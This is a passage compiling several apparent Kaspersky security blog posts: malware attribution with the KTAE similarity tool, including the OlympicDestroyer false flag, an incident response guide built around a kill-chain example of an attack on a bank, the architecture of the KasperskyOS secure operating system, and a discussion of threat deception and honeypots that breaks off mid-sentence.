Another interesting case is the discovery and publication (“DEADLYKISS: HIT ONE TO RULE THEM ALL. TELSY DISCOVERED A PROBABLE STILL UNKNOWN AND UNTREATED APT MALWARE AIMED AT COMPROMISING INTERNET SERVICE PROVIDERS“) from our colleagues at Telsy of a new, previously unknown malware deemed “DeadlyKiss”. A quick check with KTAE on the artifact with sha256 c0d70c678fcf073e6b5ad0bce14d8904b56d73595a6dde764f95d043607e639b (md5: 608f3f7f117daf1dc9378c4f56d5946f) reveals a couple of interesting similarities with other Platinum APT samples, both in terms of code and unique strings.

Analysis for 608f3f7f117daf1dc9378c4f56d5946f

Another interesting case presented itself when we were analysing a set of files included in one of the Shadowbrokers dumps.

Analysis for 07cc65907642abdc8972e62c1467e83b

In the case above, “cnli-1.dll” (md5: 07cc65907642abdc8972e62c1467e83b) is flagged as being up to 8% similar to Regin. Looking into the file, we spot this as a DLL, with a number of custom looking exports:

Looking into these exports, for instance, fileWriteEx, shows the library has actually been created to act as a wrapper for popular IO functions, most likely for portability purposes, enabling the code to be compiled for different platforms:

Speaking of multiplatform malware, recently, our colleagues from Leonardo published their awesome analysis of a new set of Turla samples, targeting Linux systems. Originally, we published about those in 2014, when we discovered Turla Penquin, which is one of this group’s backdoors for Linux. One of these samples (sha256: 67d9556c695ef6c51abf6fbab17acb3466e3149cf4d20cb64d6d34dc969b6502) was uploaded to VirusTotal in April 2020. A quick check in KTAE for this sample reveals the following:

Analysis for b4587870ecf51e8ef67d98bb83bc4be7 – Turla 64 bit Penquin sample

We can see a very high degree of similarity with two other samples (99% and 99% respectively) as well as other lower similarity hits to other known Turla Penquin samples. Looking at the strings they have in common, we immediately spot a few very good candidates for Yara rules—quite notably, some of them were already included in the Yara rules that Leonardo provided with their paper.

When code similarity fails

When looking at an exciting, brand new technology, sometimes it’s easy to overlook any drawbacks and limitations. However, it’s important to understand that code similarity technologies can only point in a certain direction, while it’s still the analyst’s duty to verify and confirm the leads. As one of my friends used to say, “the best malware similarity technology is still not a replacement for your brain” (apologies, dear friend, if the quote is not 100% exact, that was some time ago). This leads us to the case of OlympicDestroyer, a very interesting attack, originally described and named by Cisco Talos.

In their blog, the Cisco Talos researchers also pointed out that OlympicDestroyer used similar techniques to Badrabbit and NotPetya to reset the event log and delete backups. Although the intention and purpose of both implementations of the techniques are similar, there are many differences in the code semantics. It’s definitely not copy-pasted code, and because the command lines were publicly discussed on security blogs, these simple techniques became available to anyone who wants to use them.

In addition, Talos researchers noted that the evtchk.txt filename, which the malware used as a potential false-flag during its operation, was very similar to the filenames (evtdiag.exe, evtsys.exe and evtchk.bat) used by BlueNoroff/Lazarus in the Bangladesh SWIFT cyberheist in 2016.

Soon after the Talos publication, the Israeli company IntezerLabs tweeted that they had found links to Chinese APT groups. As a side node, IntezerLabs have an exceptional code similarity technology themselves that you can check out by visiting their site at analyze.intezer.com.

IntezerLabs further released a blogpost with an analysis of features found using their in-house malware similarity technology.

A few days later, media outlets started publishing articles suggesting potential motives and activities by Russian APT groups: “Crowdstrike Intelligence said that in November and December of 2017 it had observed a credential harvesting operation operating in the international sporting sector. At the time it attributed this operation to Russian hacking group Fancy Bear”…

On the other hand, Crowdstrike’s own VP of Intelligence, Adam Meyers, in an interview with the media, said: “There is no evidence connecting Fancy Bear to the Olympic attack”.

Another company, Recorded Future, decided to not attribute this attack to any actor; however, they claimed that they found similarities to BlueNoroff/Lazarus LimaCharlie malware loaders that are widely believed to be North Korean actors.

During this “attribution hell”, we also used KTAE to check the samples for any possible links to previous known campaigns. And amazingly, KTAE discovered a unique pattern that also linked Olympic Destroyer to Lazarus. A combination of certain code development environment features stored in executable files, known as a Rich header, may be used as a fingerprint identifying the malware authors and their projects in some cases. In the case of the Olympic Destroyer wiper sample analyzed by Kaspersky, this “fingerprint” produced a match with a previously known Lazarus malware sample. Here’s how today’s KTAE reports it:

Analysis for 3c0d740347b0362331c882c2dee96dbf

The 4% similarity shown above comes from the matches in the sample’s Rich header. Initially, we were surprised to find the link, even though it made sense; other companies also spotted the similarities and Lazarus was already known for many destructive attacks. Something seemed odd though. The possibility of North Korean involvement looked way off mark, especially since Kim Jong-un’s own sister attended the opening ceremony in Pyeongchang. According to our forensic findings, the attack was started immediately before the official opening ceremony on 9 February, 2018. As we dug deeper into this case, we concluded it was an elaborate false flag; further research allowed us to associate the attack with the Hades APT group (make sure you also read our analysis: “Olympic destroyer is here to trick the industry“).

This proves that even the best attribution or code similarity technology can be influenced by a sophisticated attacker, and the tools shouldn’t be relied upon blindly. Of course, in 9 out of 10 cases, the hints work very well. As actors become more and more skilled and attribution becomes a sensitive geopolitical topic, we might experience more false flags such as the ones found in the OlympicDestroyer.

If you liked this blog, then you can hear more about KTAE and using it to generate effective Yara rules during the upcoming “GReAT Ideas, powered by SAS” webinar, where, together with my colleague Kurt Baumgartner, we will be discussing practical threat hunting and how KTAE can boost your research. Make sure to register for GReAT Ideas, powered by SAS, by clicking here.

Register: https://www.brighttalk.com/webcast/15591/414427

Note: more information about the APTs discussed here, as well as KTAE, is available to customers of Kaspersky Intelligence Reporting. Contact: intelreports@kaspersky.com

Neutralization reaction

Kaspersky — Fri, 25 Aug 2017 09:45:18 +0000

Incident Response Guide (PDF)

Despite there being no revolutionary changes to the cyberthreat landscape in the last few years, the growing informatization of business processes provides cybercriminals with numerous opportunities for attacks. They are focusing on targeted attacks and learning to use their victims’ vulnerabilities more effectively while remaining under the radar. As a result, businesses are feeling the effects of next-gen threats without the appearance of new malware types.

Unfortunately, corporate information security services often turn out to be unprepared: their employees underestimate the speed, secrecy and efficiency of modern cyberattacks and do not recognize how ineffective the old approaches to security are. Even with traditional prevention tools such as anti-malware products, IDS/IPS and security scanners combined with detection solutions like SIEM and anti-APT, this costly complex may not be used to its full potential. And if there is no clear understanding of what sort of incident it is, an attack cannot be repelled.

More detailed information on the stages involved in organizing a cyberattack and responding to incidents can be found in the full version of this guide or obtained within the framework of Kaspersky Lab’s educational program. Here we will only focus on the main points.

Planning an attack

First of all, it should be noted that by targeted attacks we are referring to serious operations prepared by qualified cybercriminals. Cyber hooliganism such as defacing the homepage of a site carried out to attract attention or demonstrate capabilities, are not considered here. As a rule, successful activities of this kind means a company has no information security service to speak of, even if one exists on paper.

The basic principles of any targeted attack include thorough preparation and a stage-by-stage strategy. Here we will investigate the sequence of stages (known as the kill chain), using as an example an attack on a bank to steal money from ATMs.

1. Reconnaissance

At this stage, publicly available information about the bank and its data assets is collected. In particular, the attacker tries to determine the company’s organizational structure, tech stack, the information security measures as well as options for carrying out social engineering on its employees. The last point may include collecting information on forums and social networking sites, especially those of a professional nature.

2. Weaponization

Once the data is collected, cybercriminals choose the method of attack and select appropriate tools. They may use new or already existing malware that allows them to exploit detected security vulnerabilities. The malware delivery method is also selected at this stage.

3. Delivery

To deliver the necessary malware, email attachments, malicious and phishing links, watering hole attacks (infection of sites visited by employees of the targeted organization) or infected USB devices are used. In our example, the cybercriminals resorted to spear phishing, sending emails to specific bank employees on behalf of a financial regulator – the Central Bank of the Russian Federation (Bank of Russia). The email contained a PDF document that exploited a vulnerability in Adobe Reader.

4. Exploitation

In the event of a successful delivery, for example, an employee opening the attachment, the exploit uses the vulnerability to download the payload. As a rule, it consists of the tools necessary to carry out the subsequent stages of the attack. In our example, it was a Trojan downloader that, once installed, downloaded a bot from the attacker’s server the next time the computer was switched on.

If delivery fails, cybercriminals usually do not just give up; they take a step (or several steps) back in order to change the attack vector or malware used.

5. Installation

Malicious software infects the computer so that it cannot be detected or removed after a reboot or the installation of an update. For example, the above Trojan downloader registers itself in Windows startup and adds a bot there. When the infected PC is started next time, the Trojan checks the system for the bot and, if necessary, reloads it.

The bot, in turn, is constantly present in the computer’s memory. In order to avoid user suspicion, it is masked under a familiar system application, for example, lsass.exe (Local Security Authentication Server).

6. Command and control

At this stage, the malware waits for commands from the attackers. The most common way to receive commands is to connect the C&C server that belongs to the fraudsters. This is what the bot in our example did: when it first addressed the C&C server, it received a command to carry out further proliferation (lateral movement) and began to connect to other computers within the corporate network.

If infected computers do not have direct access to the Internet and cannot connect directly to the C&C server, the attacker can send other software to the infected machine, deploy a proxy server in the organization’s network, or infect physical media to overcome the ‘air gap’.

7. Actions on objective

Now, the cybercriminals can work with the data on a compromised computer: copying, modifying or deleting it. If the necessary information is not found, the attackers may try to infect other machines in order to increase the amount of available information or to obtain additional information that allows them to reach their primary goal.

The bot in our example infected other PCs in search of a machine from which it could log on as an administrator. Once such a machine was found, the bot turned to the C&C server to download the Mimikatz program and the Ammyy Admin remote administration tools.

Example of Mimikatz execution. All the logins and passwords are entered in clear view, including the Active Directory user passwords.

If successful, the bot can connect to the ATM Gateway and launch attacks on ATMs: for example, it can implement a program in an ATM that will dispense cash when a special plastic card is detected.

The final stage of the attack is removing and hiding any traces of the malware in the infected systems, though these activities are not usually included in the kill chain.

The effectiveness of incident investigation and the extent of material and reputational damage to the affected organization directly depend on the stage at which the attack is detected.

If the attack is detected at the ‘Actions on objective’ stage (late detection), it means the information security service was unable to withstand the attack. In this case, the affected company should reconsider its approach to information security.

My network is my castle

We have analyzed the stages of a targeted attack from the point of view of cybercriminals; now let’s look at it from the point of view of the affected company’s information security staff. The basic principles behind the work of both sides are essentially the same: careful preparation and a step-by-step strategy. But the actions and tools of the information security specialists are fundamentally different because they have very different objectives, namely:

Mitigate the damage caused by an attack;
Restore the initial state of the information system as quickly as possible;
Develop instructions to prevent similar incidents in future.

These objectives are achieved in two main stages – incident investigation and system restoration. Investigation must determine:

Initial attack vector;
Malware, exploits and other tools used by the attackers;
Target of the attack (affected networks, systems and data);
Extent of damage (including reputational damage) to the organization;
Stage of attack (whether it is completed and goals are achieved);
Time frames (time the attack started and ended, when it was detected in the system and response time of the information security service).

Once the investigation is completed, it is necessary to develop and implement a system recovery plan, using the information obtained during investigation.

Let’s return to the step-by-step strategy. Overall, the incident response protection strategy looks like this:

Incident response stages

As with the stages of the targeted attack, we will analyze in more detail each stage involved in combating an attack.

1. Preparation

Preparation includes developing processes and policies and selecting tools. First of all, it means the creation of a multi-level security system that can withstand intruders using several attack vectors. The levels of protection can be divided into two groups.

The first includes the installation of tools designed to prevent attacks (Prevention):

security solutions for workstations;
intrusion detection and intrusion prevention systems (IDS/IPS);
firewall to protect the Internet gateway;
proxy server to control Internet access.

The second group consists of solutions designed to detect threats (Detection):

SIEM system with integrated threat reporting component that monitors events occurring in the information system;
Anti-APT system that compares data on detected threats delivered by various security mechanisms;
Honeypot – a special fake object for cyberattacks that is isolated and closely monitored by the information security service;
EDR-systems (tools for detecting and responding to threats on endpoints) that raise awareness of events occurring on endpoints and enable automatic containment and elimination of threats.

The organization we chose as an example was ready for unexpected attacks. The ATMs were separated from the main network of the bank, with access to the subnet limited to authorized users.

Network of the attacked organization

The SIEM system was used to monitor and analyze events occurring on the network. It collected:

information about network connections to the proxy server that was used by all employees to access the Internet;
integrated threat data feeds provided by Kaspersky Lab specialists;
notifications of emails that passed through the Postfix mail server, including information about headers, DKIM signatures, etc.;

SIEM also received information about security solution activation on any workstation in the corporate IT infrastructure.

Another important preparation element is penetration testing to predict the possible vector of a cyberattack. Penetration of the corporate network can be simulated by both the company’s IT specialists and third-party organizations. The latter option is more expensive, though preferable: organizations that specialize in pen tests have extensive experience and are better informed about the current threat vectors.

The last – but by no means least – important element is educating the organization’s employees. This includes internal cybersecurity training for all employees: they should be aware of the corporate security policies and know what to do in the event of a cyberattack. It also includes targeted training for specialists responsible for the company’s information security, as well as the accumulation of information about security incidents inside and outside the company. This information may come from different sources such as internal company reports or third-party organizations that specialize in analyzing cyberthreats, for example, Kaspersky Threat Intelligence Portal.

2. Identification

At this stage, it is necessary to determine whether it is actually an incident or not. Only then can the alarm be raised and colleagues warned. In order to identify an incident, so-called triggers are used – events that indicate a cyberattack. These include attempts by a workstation to connect to a known malicious C&C server, errors or failures in security software performance, unexpected changes to user rights, unknown programs on the network, and much more.

Information about these events can come from a variety of sources. Here we will consider two key types of triggers:

Triggers generated by EPP management systems. When a security solution on one of the workstations detects a threat, it generates an event and sends it to the management system. However, not all events are triggers: for example, an event that indicates the detection of a malicious program can be followed by an event about its neutralization. In this case, investigation is not necessary, except when the situation occurs regularly on the same machine or with the same user.
Incident triggers generated by SIEM systems. SIEM systems can accumulate data from a huge number of security controls, including proxy servers and firewalls. Triggers are only considered to be those events that are created based on comparing incoming data and threat reports.

To identify an incident, the information available to the information security service is compared with a list of known indicators of compromise (IOC). Public reports, threat data feeds, static and dynamic sample analysis tools, etc. can be used for this purpose.

Static analysis is performed without launching the test sample and includes collecting various indicators, such as strings containing a URL or an email address, etc. Dynamic analysis involves executing the program under investigation in a protected environment (sandbox) or on an isolated machine in order to identify the sample’s behavior and collect indicators of compromise.

Cycle of IOC detection

As seen from the picture above, collecting IOCs is a cyclic process. Based on the initial information from the SIEM system, identification scenarios are generated, which leads to the identification of new indicators of compromise.

Here is an example of how threat data feeds can be used to identify a spear-phishing attack – in our case, emails with an attached PDF document that exploits an Adobe Reader vulnerability.

SIEM will detect the IP address of the server that sent the email using IP Reputation Data Feed.
SIEM will detect the request to load the bot using Malicious URL Data Feed.
SIEM will detect a request to the C&C server using Botnet C&C URL Data Feed.
Mimikatz will be detected and removed by a security solution for workstations; information about the detection will go to SIEM.

Thus, at an early stage, an attack can be detected in four different ways. It also means the company will suffer minimal damage.

3. Containment

Suppose that, due to a heavy workload, the information security service couldn’t respond to the first alarms, and by the time there was a response, the attack had reached the sixth stage, i.e., malware had successfully penetrated a computer on the corporate network and tried to contact the C&C server, and the SIEM system had received notice of the event.

In this case, the information security specialists should identify all compromised computers and change the security rules to prevent the infection from spreading over the network. In addition, they should reconfigure the information system so that it can ensure the company’s continuous operation without the infected machines. Let’s consider each of these actions in more detail.

Isolation of compromised computers

All compromised computers should be identified, for example, by finding in SIEM all calls to the known C&C address – and then placed in an isolated network. In this case, the routing policy should be changed to prevent communication between compromised machines and other computers on the corporate network, as well as the connection of compromised computers to the Internet.

It is also recommended to check the C&C address using a special service, for example, Threat Lookup. As a result, this provides not only the hashes of the bots that interacted with the C&C server but also the other addresses the bots contacted. After that it is worth repeating the search in SIEM across the extended list of indicators, since the same bot may have interacted with several C&C servers on different computers. All infected workstations that are identified must be isolated and examined.

In this case, the compromised computers should not be turned off, as this can complicate the investigation. Specifically, some types of malicious program only use the computer’s RAM and do not create files on the hard disk. Other malware can remove an IOC once the system receives a turn-off signal.

Also, it is not recommended to disconnect (primarily physically) the local network connections of the affected PC. Some types of malware monitor the connection status, and if the connection is not available for a certain period of time, malware can begin to remove traces of its presence on the computer, destroying any IOCs. At the same time, it makes sense to limit the access of infected machines to the internal and external networks (for example, by blocking the transfer of packets using iptables).

For more information on what to do if the search by a C&C address does not provide the expected results, or on how to identify malware, read the full version of this guide.

Creation of memory dumps and hard disk dumps

By analyzing memory dumps and hard disk dumps of compromised computers, you can get samples of malware and IOCs related to the attack. The study of these samples allows you to understand how to deal with the infection and identify the vector of the threat in order to prevent a repeat infection using a similar scenario. Dumps can be collected with the help of special software, for example, Forensic Toolkit.

Maintaining system performance

After the compromised computers are isolated, measures should be taken to maintain operation of the information system. For example, if several servers were compromised on the corporate network, changes should be made to the routing policy to redirect the workload from compromised servers to other servers.

4. Eradication

The goal of this stage is to restore the compromised information system to the state it was in before the attack. This includes removing malware and all artifacts that may have been left on the infected computers, as well as restoring the initial configuration of the information system.

There are two possible strategies to do this: full reinstallation of the compromised device’s OS or simply removing any malicious software. The first option is suitable for organizations that use a standard set of software for workstations. In this case, you can restore the operation of the latter using the system image. Mobile phones and other devices can be reset to the factory settings.

In the second case, artifacts created by malware can be detected using specialized tools and utilities. More details about this are available in the full version of our guide.

5. Recovery

At this stage, those computers that were previously compromised are reconnected to the network. The information security specialists continue to monitor the status of these machines to ensure the threat has been eliminated completely.

6. Lessons learned

Once the investigation has been completed, the information security service must submit a report with answers to the following questions:

When was the incident identified and who identified it?
What was the scale of the incident? Which objects were affected by the incident?
How were the Containment, Eradication, and Recovery stages executed?
At what stages of incident response do the actions of the information security specialists need to be corrected?

Based on this report and the information obtained during the investigation, it is necessary to develop measures to prevent similar incidents in the future. These can include changes to the security policies and configuration of corporate resources, training on information security for employees, etc. The indicators of compromise obtained during the incident response process may be used to detect other attacks of this kind in the future.

In order of priority

Troubles come in threes, or so the saying goes, and it can be the case that information security specialists have to respond to several incidents simultaneously. In this situation, it is very important to correctly set priorities and focus on the main threats as soon as possible – this will minimize the potential damage of an attack.

We recommend determining the severity of an incident, based on the following factors:

Network segment where the compromised PC is located;
Value of data stored on the compromised computer;
Type and number of other incidents that affected the same PC;
Reliability of the indicator of compromise for the given incident.

It should be noted that the choice of server or network segment that should be saved first, and the choice of workstation that can be sacrificed, depends on the specifics of the organization.

If the events, originating from one of the sources, include an IOC published in a report on APT threats or there is evidence of interaction with a C&C server previously used in an APT attack, we recommend dealing with these incidents first. The tools and utilities described in the full version of our Incident Response Guide can help.

Conclusion

It is impossible in one article to cover the entire arsenal that modern cybercriminals have at their disposal, describe all existing attack vectors, or develop a step-by-step guide for information security specialists to help respond to every incident. Even a series of articles would probably not be sufficient, as modern APT attacks have become extremely sophisticated and diverse. However, we hope that our recommendations about identifying incidents and responding to them will help information security specialists create a solid foundation for reliable multi-level business protection.

Features of secure OS realization

Andrey Nikishin, Ekaterina Rudina — Thu, 09 Feb 2017 12:55:01 +0000

There are generally accepted principles that developers of all secure operating systems strive to apply, but there can be completely different approaches to implementing these principles. A secure operating system can be developed from an existing OS by improving certain characteristics that are the cause (or the consequence) of that operating system’s insecure behavior, or it can be developed from scratch. The former approach has the clear advantage of lower development costs and compatibility with a broad range of software.

Let’s consider this approach in the context of systems that are part of the critical infrastructure. Two factors are important for such systems:

The ability to fulfil special security requirements, which may involve not only preserving certain general properties of information (such as confidentiality), but such things as tracking certain commands and data flows, having no impact on process execution in the system, etc.
The provision of guarantees that the system will work securely and will not be compromised.

Building a secure system based on a popular OS commonly involves implementing additional mechanisms of access control (e.g., based on the mandatory access control model), strengthened authentication, data encryption, security event auditing, and application execution control. As a rule, these are standard security measures, with the system’s special requirements addressed at the application level. As a result, special (and often also general) security measures rely on the implementation of numerous components, each of which can be compromised. Examples include: SELinux, RSBAC, AppArmor, TrustedBSD, МСВС, and Astra Linux, etc.

To improve security, tools that make it more difficult to exploit some vulnerabilities, including those inherent in the system due to its insecure original design, can be built into the system. Examples include: Grsecurity, AppArmor, Hardened Gentoo, Atlix, YANUX, and Astra Linux, etc.

Only a few years ago, a commonly used approach was to provide “security” guarantees based on scanning software code for errors and vulnerabilities and checking software integrity by comparing checksums. That approach was used in Openwall Linux, and some operating systems developed in Russia.

Although these measures lead to an overall improvement in the characteristics of general-purpose systems, they cannot address the special requirements for systems that are part of the critical infrastructure or guarantee security with a high degree of confidence.

Unlike initiatives based on attempts to improve the security of existing operating systems, KasperskyOS was, from the start, designed based on architectural principles that can ensure its secure behavior, that meets the requirements of special-purpose systems.

However, operating systems originally designed as secure cannot always guarantee that specific security policies will be enforced. Objective reasons for this include the difficulty of specifying clear security goals for such a relatively versatile IT product as an operating system, as well as the large number and variety of threats posed by the environment.

If an operating system is designed for specific uses on a more or less fixed range of hardware, with specific software running under it within defined operating scenarios, then security goals can be defined with sufficient accuracy and a threat model can be built. To achieve security goals, the model is used to develop a specific list of security requirements and trust requirements. Fulfilling these requirements is sufficient to guarantee the system’s secure behavior. Examples include specialized embedded solutions from LynuxWorks, Wind River, and Green Hills.

For a general-purpose operating system, achieving the same guarantees is more difficult due to a broader definition of security goals (which is necessary for the system to support a broader range of secure execution scenarios). As a rule, this requires support for a whole class of policies that are needed for a specific access control type (discretionary, mandatory, role-based), customary authentication mechanisms, and other protection tools whose management does not require specialist knowledge. This requires implementing relatively universal security mechanisms. Sometimes, provided that the OS runs on a fixed hardware platform (usually from the same vendor), compliance of these mechanisms with a certain standard or security profile can be guaranteed with a sufficient degree of confidence. Examples include: Oracle Solaris with Trusted Extensions, XTS-400, and OpenVMS, AS/400.

Finally, for a general-purpose operating system that runs on an arbitrary hardware platform, achieving high security guarantees is even harder because in this case the threat model grows out of all proportion.

This problem can be solved using an approach based on building a modular system from trusted components which are small and which implement standardized interfaces. The architecture of a secure system built in this way makes it possible to port a relatively small amount of software code to various hardware platforms and verify it, while keeping top-level modules so that they can be reused. Potentially, this makes it possible to provide security guarantees for each specific use of the OS.

The development model of the KasperskuOS operating system is based on implementing small trusted low-level components which enable top-level components to be reused. This provides maximum flexibility and efficiency in tailoring the system for the specific needs of a particular deployment, while maintaining the verifiability of its security properties.

The first step towards creating a modular operating system is using a microkernel-based architecture. The microkernel is the system’s only method of interaction and data exchange, providing total access control.

However, access control provided by the microkernel cannot implement properties of the system related to supporting specific security policies. KasperskyOS implements the principle of separating access-related decisions based on the policy defined from access control implemented at the microkernel level. Access decisions based on computing security policy compliance verdicts are made by a dedicated component – the security server. Flask is the best known architecture based on this principle.

It should be noted that a number of enhanced-security operating systems (SELinux, SEBSD) based on general-purpose systems have been built using the Flask architecture, but these systems use a large monolithic kernel. In fact, Flask does not require using a microkernel, but it works best with one.

KasperskyOS does not reproduce the Flask architecture in full but develops its ideas to provide better security and flexibility of use in target systems. The original Flask architecture describes interfaces and requirements for the two main components involved in applying security policies to interaction – a security server, which computes security verdicts, and an object manager, which provides access based on these verdicts. The development of KasperskyOS is, to a large extent, focused on preserving trust not only for mechanisms that compute and apply verdicts, but also for the configuration based on which this computation is performed. Basic security policies are combined into more sophisticated rules using a configuration language. These rules are then compiled into a component that acts as an intermediary between the security server and the microkernel, enabling verdicts to be computed in a way that provides the required business logic.

The major architectural difference between KasperskyOS and other secure operating systems available in the market is that the former implements security policies for each specific deployment of the OS. Support for those policies which are not needed is simply not included in the system. As a result, in each deployment of the operating system the security subsystem provides only required functionality, excluding everything that is not needed.

As a result, KasperskyOS provides configuration of overall security policy parameters (system-wide configuration at the security server level) and rules for applying policies to each operation performed by each entity in the system (through configuration of verdict computation).

The trusted code obtained by compiling configurations connects application software with the security model in the system, specifying which operations performed by programs should be governed by which security policies. Importantly, the code does not include any information about operations or policies except references to them.

The architecture of KasperskyOS supports flexibility, applying policies to individual operations performed by different types of processes (without potentially jeopardizing security through possible compromise of the configuration).

Of course, a microkernel-based system that has Flask-like architecture is not a unique idea invented by KasperskyOS developers. There is a history of successful microkernel development (seL4, PikeOS, Feniks/Febos), including microkernels with formally verified security properties. This work can be used to implement an OS that can guarantee security domain isolation (provide “security through isolation”) – an architecture known as MILS (Multiple Independent Domains of Safety/Security).

However, this case involves developing not just a microkernel but a fully-functional operating system that provides not only the separation of security domains and isolation of incompatible information processing environments, but also control of security policy compliance within these domains. Importantly, the microkernel, the infrastructure of the OS based on it and the security policies are developed by the same vendor. Using third-party work, even if it is of high quality, always imposes limitations.

KasperskyOS is based on a microkernel developed in-house, because this provides the greatest freedom in implementing the required security architecture.

The greatest shortcoming of operating systems built from scratch is the lack of support for existing software. In part, this shortcoming can be compensated for by maintaining compatibility with popular programming interfaces, the best known of which is POSIX.

This shortcoming is also successfully remedied by using virtualization. A secure operating system in whose environment a hypervisor for virtualizing a general-purpose system can be launched, will be able to execute software for that OS. KasperskyOS, together with Kaspersky Secure Hypervisor, provides this capability. Provided that certain conditions are met, an insecure general-purpose IS can inherit the security properties of the host OS.

KasperskyOS is built with modern trends in the development and use of operating systems in mind, in order to implement efficient, practical and secure solutions.

To summarize, the KasperskyOS secure operating system is not an extension or improvement of existing operating systems, but this does not narrow the range of its applications. The system can be used as a foundation for developing solutions that have special security requirements. Capabilities related to providing flexible and effective application execution control are inherent in the architecture of KasperskyOS. The system’s development is based on security product implementation best practices and supported by scientific and practical research.

Deceive in order to detect

Denis Makrushin — Thu, 19 Jan 2017 10:32:35 +0000

Interactivity is a security system feature that implies interaction with the attacker and their tools as well as an impact on the attack scenario depending on the attacker’s actions. For example, introducing junk search results to confuse the vulnerability scanners used by cybercriminals is interactive. As well as causing problems for the cybercriminals and their tools, these methods have long been used by researchers to obtain information about the fraudsters and their goals.

There is a fairly clear distinction between interactive and “offensive” protection methods. The former imply interaction with attackers in order to detect them inside the protected infrastructure, divert their attention and lead them down the wrong track. The latter may include all the above plus exploitation of vulnerabilities on the attackers’ own resources (so-called “hacking-back”). Hacking-back is not only against the law in many countries (unless the defending side is a state organization carrying out law enforcement activities) it may also endanger third parties, such as users’ computers compromised by cybercriminals.

The use of interactive protection methods that don’t break the law and that can be used in an organization’s existing IT security processes make it possible not only to discover if there is an intruder inside the infrastructure but also to create a threat profile.

One such approach is Threat Deception – a set of methods, specialized solutions and processes that have long been used by researchers to analyze threats. In our opinion, this approach can also be used to protect valuable data inside the corporate network from targeted attacks.

Characteristics of targeted attacks

Despite the abundance of technology and specialized solutions to protect corporate networks, information security incidents continue to occur even in large organizations that invest lots of money to secure their information systems.

Part of the reason for these incidents is the fact that the architecture of automated security solutions, based on identifying patterns in general traffic flows or monitoring a huge number of endpoints, will sooner or later fail to recognize an unknown threat or a criminal stealing valuable data from the infrastructure. This may occur, for example, if the attacker has studied the specific features of a corporate security system in advance and identified a way of stealing valuable data that will go unnoticed by security solutions and will be lost among the legitimate operations of other users.

nother reason is the fact that APT attacks differ from other types of attacks: in terms of target selection and pinpoint execution, they are similar to surgical strikes, rather than the blanket bombing of mass attacks.

The organizers of targeted attacks carefully study the targeted infrastructure, identifying gaps in configuration and vulnerabilities that can be exploited during an attack. With the right budget, an attacker can even deploy the products and solutions that are installed in the targeted corporate network on a testbed. Any vulnerabilities or flaws identified in the configuration may be unique to a specific victim.

This allows cybercriminals to go undetected on the network and steal valuable data for long periods of time.

To protect against an APT, it is necessary not only to combat the attacker’s tools (utilities to analyze security status, malicious code, etc.) but to use specific behavioral traits on the corporate network to promptly detect their presence and prevent any negative consequences that may arise from their actions. Despite the fact that the attacker usually has enough funds to thoroughly examine the victim’s corporate network, the defending side still has the main advantage – full physical access to its network resources. And it can use this to create its own rules on its own territory for hiding valuable data and detecting an intruder.

After all, “locks only keep an honest person honest,” but with a motivated cybercriminal a lock alone is not enough – a watchdog is required to notify the owner about a thief before he has time to steal something.

Interactive games with an attacker

In our opinion, in addition to the obligatory conventional methods and technologies to protect valuable corporate information, the defensive side needs to build interactive security systems in order to get new sources of information about the attacker who, for one reason or another, has been detected inside the protected corporate network.

Interactivity in a security system implies a reaction to the attacker’s actions. That reaction, for instance, may be the inclusion of the attacker’s resources to a black list (e.g. the IP address of the workstations from which the attack is carried out) or the isolation of compromised workstations from other network resources. An attacker who is looking for valuable data within a corporate network may be deliberately misled, or the tools used by the attacker, such as vulnerability scanners, could be tricked into leading them in the wrong direction.

Let’s assume that the defending side has figured out all the possible scenarios where the corporate network can be compromised and sets traps on the protected resource:

a special tool capable of deceiving automated vulnerability scanners and introducing all sorts of “junk” (information about non-existent services or vulnerabilities, etc.) in reports;
a web scenario containing a vulnerability that, when exploited, leads the attacker to the next trap (described below);
a pre-prepared section of the web resource that imitates the administration panel and contains fake documents.

How can these traps help?

Below is a simple scenario showing how a resource with no special security measures can be compromised:

The attacker uses a vulnerability scanner to find a vulnerability on the server side of the protected infrastructure, for example, the ability to perform an SQL injection in a web application.
The attacker successfully exploits this vulnerability on the server side and gains access to the closed zone of the web resource (the administration panel).
The attacker uses the gained privileges to study the inventory of available resources, finds documents intended for internal use only and downloads them.

Let’s consider the same scenario in the context of a corporate network where the valuable data is protected using an interactive system:

The attacker searches for vulnerabilities on the server side of the protected infrastructure using automated means (vulnerability scanner and directory scanner). Because the defending side has pre-deployed a special tool to deceive scanning tools, the attacker has to spend time analyzing the scan results, after which the attacker finds a vulnerability – the trap on the server side of the protected infrastructure.
The attacker successfully exploits the detected vulnerability and gains access to the closed zone of the web resource (the administration panel). The attempt to exploit the vulnerability is recorded in the log file, and a notification is sent to the security service team.
The attacker uses the gained privileges to study the inventory of available resources, finds the fake documents and downloads them.
The downloaded documents contain scripts that call the servers controlled by the defending side. The parameters of the call (source of the request, time, etc.) are recorded in the log file. This information can then be used for attacker attribution (what type of information they are interested in, where the workstations used in the attack are located, the subnets, etc.) and to investigate the incident.

Detecting an attack by deceiving the attacker

Currently, in order to strengthen protection of corporate networks the so-called Threat Deception approach is used. The term ‘deception’ comes from the military sphere, where it refers to a combination of measures aimed at misleading the enemy about one’s presence, location, actions and intentions. In IT security, the objective of this interactive system of protection is to detect an intruder inside the corporate network, identifying their attributes and ultimately removing them from the protected infrastructure.

The threat deception approach involves the implementation of interactive protection systems based on the deployment of traps (honeypots) in the corporate network and exploiting specific features of the attacker’s behavior. In most cases, honeypots are set to divert the attacker’s attention from the truly valuable corporate resources (servers, workstations, databases, files, etc.). The use of traps also makes it possible to get information about any interaction between the attacker and the resource (the time interactions occur; types of data attracting the attacker’s attention, toolset used by the attacker, etc.).

However, it’s often the case that a poorly deployed trap inside a corporate network will not only be successfully detected and bypassed by the attackers but can serve as an entry point to genuine workstations and servers containing valuable information.

Incorrect implementation of a honeypot in the corporate network can be likened to building a small house next to a larger building containing valuable data. The smaller house is unlikely to divert the attention of the attacker; they will know where the valuable information is and where to look for the “key” to access it.

Simply installing and configuring honeypots is not enough to effectively combat cybercriminals; a more nuanced approach to developing scenarios to detect targeted attacks is required. At the very least, it is necessary to carry out an expert evaluation of the attacker’s potential actions, to set honeypots so that the attacker cannot determine which resources (workstations, files on workstations and servers, etc.) are traps and which are not, and to have a plan for dealing with the detected activity.

Correct implementation of traps and a rapid response to any events related to them make it possible to build an infrastructure where almost any attacker will lose their way (fail to find the protected information and reveal their presence).

Forewarned is forearmed

Getting information about a cybercriminal in the corporate network enables the defending side to take measures to protect their valuable data and eliminate the threat:

